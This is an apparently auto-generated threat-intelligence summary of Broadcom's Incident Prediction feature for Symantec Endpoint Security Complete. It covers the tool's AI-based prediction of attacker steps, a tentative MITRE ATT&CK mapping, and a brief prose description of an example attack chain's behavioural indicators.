Full Report
Introducing Incident Prediction, an industry-first capability that can accurately predict an attackers’ next four or five moves with up to 100% confidence
Analysis Summary
# Tool/Technique: Incident Prediction (via Symantec Endpoint Security Complete)
## Overview
Incident Prediction is a security capability integrated into Broadcom's Symantec Endpoint Security Complete (leveraging Adaptive Protection technology). Its purpose is to use Artificial Intelligence (AI) and Machine Learning (ML) to predict the attacker's next actions in an active cyber incident chain, allowing security teams to disrupt these future steps granularly without causing complete system or network shutdowns.
## Technical Details
- Type: Tool / Security Capability
- Platform: Endpoint, Cloud Analytics (Implied for Symantec Endpoint Security Complete)
- Capabilities: Predictive threat analysis, granular mitigation enforcement, automated incident reversion.
- First Seen: Announced in the context of this article/report, related to existing Adaptive Protection technology.
## MITRE ATT&CK Mapping
Since Incident Prediction is a defensive capability designed to counter established TTPs, the mapping focuses on the *adversary behaviors* it aims to disrupt, particularly LOTL attacks.
- **TA0001 - Initial Access**
- Potentially mapping to techniques used early in the chain (e.g., T1189 - Drive-by Compromise, if initial access is predicted)
- **TA0003 - Persistence**
- If prediction targets established footholds.
- **TA0005 - Defense Evasion**
- T1218 - Signed Binary Proxy Execution (Common in LOTL)
- **TA0007 - Credential Access**
- Predicting attempts to steal credentials (as mentioned in the example).
- T1003 - OS Credential Dumping
- **TA0008 - Lateral Movement**
- Predicting steps to move across the network.
- **TA0011 - Command and Control**
- Predicting subsequent C2 activity after initial execution.
## Functionality
### Core Capabilities
- **Prediction:** Utilizes a catalog of over 500,000 documented attack chains to predict the next four or five moves an attacker will take with high confidence (up to 100%).
- **Disruption:** Allows security analysts to mitigate and block *predicted* malicious actions via the Adaptive Protection policy, stopping the attack chain before it executes the predicted step.
- **Granular Control:** Stops only the predicted malicious behaviors, avoiding costly, full system or network shutdowns often induced by traditional ransomware response.
### Advanced Features
- **AI/ML-Driven:** Leverages advanced AI/ML, inspired by Generative AI LLMs, to model and anticipate attacker behavior.
- **Reversion:** Automatically creates a revert task, enabling analysts to easily undo mitigation steps post-investigation.
- **LOTL Disruption:** Specifically designed and trained to identify and disrupt Living Off the Land (LOTL) techniques, where malware deployment is sparse.
- **Confidence Scoring:** Provides predicted next steps along with an associated probability percentage (0-100%).
## Indicators of Compromise
*Note: As this describes a defensive tool, no direct IoCs are provided, but the system detects the IoCs generated by the attack.*
- File Hashes: [N/A - Detects based on behavior]
- File Names: [JS files, ZIP files executing via wscript.exe/PowerShell, VBS files]
- Registry Keys: [N/A]
- Network Indicators: [HTTP download observed during execution phase]
- Behavioral Indicators: [Downloading and executing a JS file; wscript.exe executing JS content launching PowerShell; PowerShell downloading ZIP over HTTP and extracting to c:\\users\\public\\]
## Associated Threat Actors
- Ransomware Groups
- Nation-State Attackers
- Attackers utilizing predictable Tactics, Techniques, and Procedures (TTPs).
## Detection Methods
- **Behavioral Detection:** Based on advanced analytics trained on attack chains to detect deviations characteristic of ongoing malicious activity, even when using legitimate software (LOTL).
- **AI/ML Analysis:** Identifying sequences of actions that strongly correlate with known attack patterns within the vast attack catalog.
- **Confidence Thresholding:** Alerts are generated when behaviors trigger detection, supplemented by predictions that reach high-confidence percentages.
## Mitigation Strategies
- **Preventative Disruption:** Applying granular blocks via the Adaptive Protection policy to predicted malicious behaviors before they occur.
- **Operational Continuity:** Maintaining business operations by avoiding mandatory network shutdowns.
- **Post-Incident Reversion:** Using the created revert task to undo mitigations if necessary after further investigation.
## Related Tools/Techniques
- Broadcom Adaptive Protection technology (Extended by Incident Prediction)
- Living Off the Land (LOTL) Techniques (The primary attack methodology being countered)
- AI/ML-based Threat Hunting Platforms